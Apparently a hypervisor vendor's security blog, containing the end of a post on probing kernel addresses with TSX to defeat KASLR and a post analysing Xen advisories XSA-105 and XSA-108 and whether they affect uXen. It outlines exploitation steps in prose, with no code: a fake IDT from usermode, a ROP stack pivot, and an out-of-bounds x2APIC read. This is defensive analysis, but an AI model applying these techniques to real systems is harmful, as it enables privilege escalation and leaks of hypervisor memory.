Haswell Intel CPUs introduced the “transactional synchronization extensions”. It means than only recent CPUs support them; moreover, Intel recommends disabling them via microcode update, as they are apparently not reliable. Yet we may assume that someday they will be fixed and become widespread.

TSX makes kernel address probing much faster and less noisy. If an instruction executed within XBEGIN/XEND block (in usermode) tries to access kernel memory, then no page fault is raised – instead transaction abort happens, so execution never leaves usermode. On my i7-4800MQ CPU, the relevant timings, in CPU cycles, are (minimal/average/variance, 2000 probes, top half of results discarded):

  1. access in TSX block to mapped kernel memory: 172 175 2
  2. access in TSX block to unmapped kernel memory: 200 200 0
  3. access in __try block to mapped kernel memory: 2172 2187 35
  4. access in __try block to unmapped kernel memory: 2192 2213 57

The difference is visible with naked eye; an attack using TSX is much simpler and faster.

Two points as a take-away:

  1. KASLR can be bypassed in an OS-independed way; this post describes how the existing techniques can be improved utilizing TSX instructions.
  2. The attack is possible because of shared address space between kernel and usermode. Hypervisor has a separate address space, and therefore it is not prone to similar attacks.
October 1, 2014 / Rafal Wojtczuk

Musings on the recent Xen Security Advisories

As all careful readers of this blog certainly know, the Bromium vSentry hypervisor (uXen) has been derived from Xen. It means parts of the codebase are shared between the two projects, and vulnerabilities found in Xen sometimes are relevant for uXen. The two recent Xen Security Advisories, XSA-105 and XSA-108, are not particularly severe (at least for vSentry), but feature interesting details related to generic hypervisor hardening that are worth discussing. One may wish to read the original Xen advisories before proceeding.


The title of advisory is “Missing privilege level checks in x86 HLT, LGDT, LIDT, and LMSW emulation”. The impact (for Xen) is ability of an unprivileged VM usermode to elevate to VM kernel.
In some scenarios when CPU cannot execute an instruction in a VM properly (because e.g. this instruction touches memory-mapped register, and has device-specific side effect) Xen emulates the instruction. The problem is that the code responsible for emulating the above instructions did not check whether CPU was in kernel mode. Particularly LGDT and LIDT are normally available for kernel mode only, as they change the crucial CPU registers. Because of the vulnerability, user process in a VM (even one with very low privileges, e.g. Untrusted integrity level in case
of Windows) could effectively execute LIDT or LGDT and take full control over VM.

Exploitation is straightforward in case of Windows 7, one can just create a fake IDT table in usermode, and kernel will transfer control to attacker’s code (residing in usermode pages) upon the first interrupt. On Windows 8 running on CPU featuring SMEP, attacker needs a bit more work and create a ROP chain in kernel – fortunately for an attacker, at the entry to the [software] interrupt handler, all general-purpose registers are controllable, so it is easy to achieve the stack pivot.

It is remarkable that in fact, no sane OS needs support of emulation of these instructions in normal circumstances. Still, a complete emulator imported into Xen is available throughout VM’s lifetime, resulting in a vulnerability. In the early days of uXen development, it was recognized that the emulator constitutes an attack vector, and a conscious effort was made to reduce the number of supported instructions. Therefore, uXen is not vulnerable – when an exploit is run in a vSetry microVM, the emulation is denied (with a message
(uXEN) c:/br/bld/uxen/xen/uxen/arch/x86/x86_emulate/x86_emulate.c:1383:d187 instruction emulation restricted for twobyte-instruction 0x1
in the logs) and the microVM is killed.

To sum up, Xen users should worry about this vulnerability if they run untrusted code in their VMs (think sandboxed code) and care about privilege elevation within VM. uXen is not affected.


The title of the advisory is “Improper MSR range used for x2APIC emulation”. The impact is that a malicious VM kernel can crash Xen or read up to 3K of its memory, from an address that is not under control of an attacker.

The root cause is that the code responsible for emulation of access to local APIC registers in x2APIC mode supported 1024 registers, but allocated buffer space for 256 registers only. If a write access (by wrmsr instruction) is requested by VM, no harm is done, as only a limited number of known registers are actually emulated. On the other hand, the code implementing read access emulation just reads from the vlapic->regs buffer (that is one page long), at an offset controlled by the attacker (must be less than 16K).
Consequently, memory located up to 12K after the vlapic->regs buffer is read and returned to the VM. More precisely, 4byte-long integers located at 16bytes-aligned addresses can be read. If the virtual addresses adjacent to vlapic->regs buffer are unmapped, this results in Xen crash; if they are mapped, their contents leak to the VM.

The vulnerable code is present in uXen. uXen uses a specialized memory manager (dubbed memcache”), that preallocates a large contiguous virtual memory range for the purpose of mapping VM-related pages. As a result, uXen crash is unlikely, it can happen only when the vlapic->regs buffer is mapped near the end of the memcache.
Similarly, the information leak is somewhat restricted – memcache stores only pages allocated for uXen purposes, therefore (if we neglect the unlikely “end of memcache” scenario) there is no possibility that unrelated host’s kernel memory can leak to the microVM. In the common case, memcache assigns consecutive virtual addresses for mapping of subsequent page allocations. During microVM setup, the order of allocation is such that the three pages allocated
immediately after vlapic->regs allocation store VMCS, VMCS shadow and MSR bitmap pages. Therefore, in the common case, all the atacker can achieve is leaking lower 32 bits of pointers from VMCS, which might help to deduce the ALSR layout of the host kernel. This is not a catastrophic problem in itself, but it can aid in exploitation of another unrelated vulnerability. In a corner case when microVM creation races with heavy map/unmap operations done on other microVM’s memory, this memory would leak to the attacker as well.

To sum up, this vulnerability has potential for crashing the whole hypervisor or leaking limited amount of data from hypervisor.. This is not very severe impact, although if one runs multiple VMs of different origin on the same host and is very serious about possibility of leaking data (even small amount from an location not controlled by an attacker) from one VM to another, prompt patching is justified. Interestingly, there was quite some concern in the media about this vulnerability, but it was clearly overhyped.

Interestingly, vSentry microVMs use xAPIC mode, not in x2APIC mode. The vulnerability can be exploited only in x2APIC mode. It means that an attacker needs to enable x2APIC mode first. However, this results in microVM OS being unable to use APIC, and hang in IPI processing. In order to exploit this vulnerability repeatedly for more than a few seconds, attacker would need to patch VM OS to use APIC in x2APIC mode, which is far from trivial, yet imaginable.
It also means we missed a generic hardening opportunity – we should support only a single APIC mode. There is still room for improvement, but considering that since the release of the first vSentry version there was no vulnerability in Xen allowing for escape from VM that would affect us, it looks we have done a fairly decent job.


Get every new post delivered to your Inbox.

Join 52 other followers